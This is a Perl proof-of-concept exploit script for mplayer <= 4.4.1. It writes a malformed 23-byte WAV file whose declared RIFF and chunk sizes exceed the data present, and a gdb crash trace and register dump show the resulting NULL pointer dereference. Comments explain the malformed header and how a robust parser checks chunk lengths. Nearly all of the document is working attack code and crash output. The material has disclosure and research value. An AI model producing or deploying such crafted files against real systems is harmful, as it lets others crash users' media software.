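#!/usr/bin/perl
# Exploit Title: mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day
# Date: 17/03/2010
# Author: Pietro Oliva
# Software Link:
# Version: <= 4.4.1
# Tested on: ubuntu 9.10 but should work in windows too
# CVE :
#
# gdb session recorded when mplayer opened the generated file:
#
#Program received signal SIGSEGV, Segmentation fault.
#0x081176d8 in af_calc_filter_multiplier ()
#(gdb) disas af_calc_filter_multiplier
#Dump of assembler code for function af_calc_filter_multiplier:
#0x081176d0 : push %ebp
#0x081176d1 : mov %esp,%ebp
#0x081176d3 : fld1
#0x081176d5 : mov 0x8(%ebp),%eax
#0x081176d8 : mov (%eax),%eax ==> mplayer tries to dereference eax, which is a NULL pointer!!!
#0x081176da : lea 0x0(%esi),%esi
#0x081176e0 : fmull 0x28(%eax)
#0x081176e3 : mov 0x18(%eax),%eax
#0x081176e6 : test %eax,%eax
#0x081176e8 : jne 0x81176e0
#0x081176ea : pop %ebp
#0x081176eb : ret
#End of assembler dump.
# REGISTERS:
#eax 0x0 0 ==========> NULL
#ecx 0xfa157a57 -99255721
#edx 0x1fe0 8160
#ebx 0x8509a08 139500040
#esp 0xbfffe2e8 0xbfffe2e8
#ebp 0xbfffe2e8 0xbfffe2e8
#esi 0x7b84000 129515520
#edi 0xf8000 1015808
#eip 0x81176d8 0x81176d8
#eflags 0x10216 [ PF AF IF RF ]
#cs 0x73 115
#ss 0x7b 123
#ds 0x7b 123
#es 0x7b 123
#fs 0x0 0
#gs 0x33 51
#
# The script below writes a 23-byte file named mplayer.wav into the current
# directory. The shebang was moved to line 1 so the file also runs when
# executed directly; the original two-arg, bareword `open` and unchecked
# `print`/`close` have been replaced so a failed write is reported instead
# of being silently ignored.

use strict;
use warnings;

my $out_file = 'mplayer.wav';

print "[+] mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day by Pietro Oliva\n";
print "[+] pietroliva[at]gmail[dot]com http://olivapietro.altervista.org\n";
print "[+] creating crafted file mplayer.wav\n";

# Minimal RIFF/WAVE header whose declared sizes do not match the data actually
# present: the RIFF size field claims 0x041f bytes and the "fmt " chunk header
# claims 0x10 bytes of format data, but only three bytes follow the chunk
# header (format tag 0x0001 and a single further byte) before the file ends.
# A robust parser checks each declared chunk length against the bytes it
# really read before using the parsed fields.
my $buffer = "\x52\x49\x46\x46\x1f\x04\x00\x00"   # "RIFF", RIFF size 0x041f
           . "\x57\x41\x56\x45"                   # "WAVE"
           . "\x66\x6d\x74\x20\x10\x00\x00\x00"   # "fmt ", chunk size 0x10
           . "\x01\x00\x1f";                      # format tag 1, then truncated

open my $fh, '>', $out_file or die "open $out_file: $!";
binmode $fh;   # raw bytes: no newline/encoding translation, also on Windows
print {$fh} $buffer or die "write $out_file: $!";
close $fh or die "close $out_file: $!";   # buffered write errors surface here

print "[+] done!\n";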